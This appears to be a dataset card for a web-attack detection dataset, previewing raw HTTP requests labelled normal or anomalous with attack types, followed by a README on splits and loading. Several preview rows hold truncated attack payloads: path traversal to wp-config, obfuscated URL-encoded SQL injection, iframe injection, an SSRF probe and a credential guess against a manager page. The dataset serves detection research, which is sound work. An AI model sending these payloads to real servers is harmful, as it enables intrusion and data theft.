GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: e6a64b5f-4c9c-4649-a888-27db82015032
normal
none
POST /wp-admin/admin-ajax.php?template=../../../../../../../wp-config&value=a&min_symbols=1 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Connection: close Content-Length: 24 Content-Type: application/x-www-form-urlenco...
anomalous
Advanced_Vulnerability_Scan
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/...
anomalous
Cross_Site_Request_Forgery
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64: x64: rv:140.0) Gecko/20100101 Firefox/140.0 Connection: close Accept-Encoding: gzip
anomalous
Advanced_Vulnerability_Scan
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 ...
anomalous
Directory_Traversal
GET /rest/products/search?q=%74%65%73%74%60%29%2F%2A%21%77%48%45%52%65%2A%2F%37%39%39%32%3D%37%39%39%32%3B%2F%2A%21%73%45%6C%65%43%54%2A%2F%44%42%4D%53%5F%50%49%50%45%2E%72%65%43%45%49%76%65%5F%6D%45%73%73%41%67%65%28%63%48%52%28%31%30%39%29%7C%7C%63%48%52%28%37%38%29%7C%7C%63%48%52%28%31%30%34%29%7C%7C%63%48%52%28%39%...
anomalous
SQL_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Acce...
anomalous
HTML_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Acce...
anomalous
XML_External_Entity
GET /rest/products/search?q=%74%65%73%74%27%29%2F%2A%21%4F%72%2A%2F%28%2F%2A%21%73%65%6C%65%63%54%2A%2F%37%32%34%35%2F%2A%2A%2F%66%52%4F%6D%28%2F%2A%21%73%65%6C%65%63%54%2A%2F%43%6F%75%6E%54%28%2A%29%2C%63%4F%4E%43%41%54%28%30%78%37%31%37%30%36%32%36%62%37%31%2C%28%2F%2A%21%73%65%6C%65%63%54%2A%2F%28%45%6C%54%28%37%32%...
anomalous
SQL_Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: d63c4921-f59e-40c8-8d61-7b014562a3b6
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Acce...
anomalous
Cross_Site_Scripting
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 49782ca1-7fe0-40eb-ac55-19bb7de01276
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate ...
anomalous
Web_Cache_Deception
GET /rest/products/search?q=<iFrAmE>HaCkEd bY AtTaCkEr</IfRaMe> HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/...
anomalous
HTML_Injection
GET /vulnerabilities/sqli/?id=file://0.0.0.0:25 HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-def...
anomalous
Server_Side_Request_Forgery
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: be4812aa-c553-4976-b0e8-f42e1422e446
normal
none
GET /rest/products/search?q=%2D%39%30%34%33%27%2F%2A%21%4F%72%2A%2F%28%2F%2A%21%73%65%6C%65%63%54%2A%2F%28%2F%2A%21%43%61%53%65%2A%2F%2F%2A%21%57%68%45%6E%2A%2F%28%38%36%30%34%3D%37%34%31%36%29%2F%2A%21%74%48%65%6E%2A%2F%2F%2A%21%6E%55%6C%4C%2A%2F%2F%2A%21%65%6C%73%45%2A%2F%43%54%58%53%59%53%2E%44%52%49%54%48%53%58%2E%...
anomalous
SQL_Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 474bad5d-ef7d-4da5-b859-9467c965033e
normal
none
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 69127516-4a51-4250-b1a5-e595379ac2e6
normal
none
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*...
anomalous
Directory_Traversal
GET /rest/products/search?q=%74%65%73%74%22%29%2F%2A%21%41%73%2A%2F%6B%6E%6A%73%2F%2A%21%57%68%65%72%45%2A%2F%33%37%39%31%3D%33%37%39%31%2F%2A%21%41%6E%44%2A%2F%52%6F%77%28%39%33%38%39%2C%31%36%39%30%29%2F%2A%21%4E%4F%74%2A%2F%2F%2A%21%62%65%74%77%65%45%4E%2A%2F%30%2F%2A%21%41%6E%44%2A%2F%28%2F%2A%21%53%65%6C%45%43%74%...
anomalous
SQL_Injection
GET /manager/html HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Authorization: Basic UUNDOmtkc3hj Accept-Encoding: gzip Connection: close
anomalous
Advanced_Vulnerability_Scan
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x...
anomalous
LDAP_Injection
GET /?ref=5a49f335-602c-4b8c-a575-3a1f326f62b2&session_token=5646 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 5a49f335-602c-4b...
normal
none
End of preview. Expand in Data Studio

web-attack-detection-dataset

A comprehensive dataset for web attack detection and classification, containing balanced HTTP traffic data with various attack types.

This dataset includes:

  • Normal HTTP requests for benign traffic
  • Anomalous HTTP requests representing different attack vectors
  • 16 different attack types including SQL injection, XSS, LFI, etc.
  • Balanced distribution to prevent overfitting

Dataset Information

  • Training set: 105,757 records (11.5 MB)
  • Validation set: 15,855 records (1.7 MB)
  • Total records: 121,612
  • Attack types: 16 categories
  • Format: Apache Parquet (compressed)

Data Format

  • raw-request: Raw HTTP request string
  • label: Classification label ("normal" or "anomalous")
  • attack_type: Specific attack type (empty for normal requests)

Usage

from datasets import load_dataset

# Load the dataset
dataset = load_dataset("web-attack-detection-dataset")

# Access train and test splits
train_data = dataset['train']
test_data = dataset['test']

# Dataset info
print(f"Training samples: {len(train_data)}")
print(f"Test samples: {len(test_data)}")

Statistics

  • Training set: 105,757 records (11.5 MB)
  • Validation set: 15,855 records (1.7 MB)
  • Total records: 121,612
  • Attack types: 16 categories
  • Format: Apache Parquet (compressed)

License

Please check the original dataset license and usage terms.

Downloads last month
7